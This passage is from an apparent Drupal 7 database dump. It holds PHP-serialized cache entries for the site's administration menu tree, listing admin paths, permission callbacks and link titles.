pages.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:411;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"411\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/access/%\";s:11:\"router_path\";s:22:\"admin/reports/access/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:66:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:16:\"View access log.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"411\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:21:\"statistics_access_log\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/access/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:16:\"View access log.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:416;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"416\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/adsense\";s:11:\"router_path\";s:21:\"admin/reports/adsense\";s:10:\"link_title\";s:14:\"AdSense clicks\";s:7:\"options\";s:71:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:21:\"Track AdSense clicks.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"416\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:29:\"a:1:{i:0;s:11:\"view clicks\";}\";s:13:\"page_callback\";s:17:\"adsense_click_log\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/adsense\";s:5:\"title\";s:14:\"AdSense clicks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:21:\"Track AdSense clicks.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:346;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"346\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:26:\"http://www.ollital.de/blog\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:4:\"Blog\";s:7:\"options\";s:58:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:9:\"Mein Blog\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"346\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1444940260,1),('links:management:tree-data:en:d1ec00b9da5d28c6b91c93d44c477a09f6c42d5da734e0482198f9dba8c4ec19','a:2:{s:4:\"tree\";a:2:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:14:{i:42;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"42\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/fields\";s:11:\"router_path\";s:20:\"admin/reports/fields\";s:10:\"link_title\";s:10:\"Field list\";s:7:\"options\";s:89:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Overview of fields on all entity 